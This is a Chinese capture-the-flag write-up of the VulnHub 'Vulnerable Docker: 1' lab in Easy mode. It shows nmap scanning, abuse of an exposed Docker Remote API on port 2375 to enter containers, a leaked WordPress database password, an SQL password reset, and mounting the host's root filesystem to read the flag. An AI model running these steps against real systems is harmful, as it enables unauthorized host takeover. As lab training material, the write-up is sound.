vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

admin 2022年4月10日21:33:57评论125 views字数 1098阅读3分39秒阅读模式

虚拟机信息:

虚拟机下载地址https://www.vulnhub.com/entry/vulnerable-docker-1,208/

虚拟机简介:2 种模式

    • 困难:这需要您结合您的 docker 技能以及您的渗透测试技能来实现主机妥协。

    • 简单:相对简单的路径,知道 docker 就足以破坏机器并在主机上获得 root

目标:2个flag(flag_1 和 flag_3),在主机上获得 id=0 shell 访问权限

级别:简单/中级

1.1 信息收集

在主机开启时,需要选择Easy模式

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

1.主机信息收集

1.使用arp-scan进行扫描探测IP地址

arp-scan 192.168.207.0/24

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

2.通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.132

查看开放22、2375和8000端口

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

2.Docker 接口调用

2375端口为docker Remote API接口

1.查看docker版本

docker -H tcp://192.168.207.132:2375 version

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

2.查看运行容器

docker -H tcp://192.168.207.132:2375 ps -a

查看运行三台容器

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

3.连接wordpress主机

docker -H tcp://192.168.207.132:2375 exec -it content_wordpress_1 /bin/bash

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

4.查看配置文件

cat wp-config.php

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

5.连接数据库

docker -H tcp://192.168.207.132:2375 exec -it content_db_1 /bin/bash
mysql -uwordpress -pWordPressISBest

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

6.查看数据库信息

use wordpress
show databases;
select * from wp_users;

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

7.修改登录密码

UPDATE wordpress.wp_users SET user_pass=MD5("password") WHERE ID=1;

修改用户名为:bob,密码为:password

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

8.登录WordPress获取到flag1

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

9.查看本地镜像

docker -H tcp://192.168.207.132:2375 images

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

10.创建本地文件挂载

docker -H tcp://192.168.207.132:2375 run --rm -it --entrypoint bash -v /:/tmp/root wordpress
cd /tmp/root/

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

11.获取flag信息

cat flag_3

vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式


原文始发于微信公众号(安全孺子牛):vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月10日21:33:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式http://cn-sec.com/archives/894051.html

发表评论

匿名网友 填写信息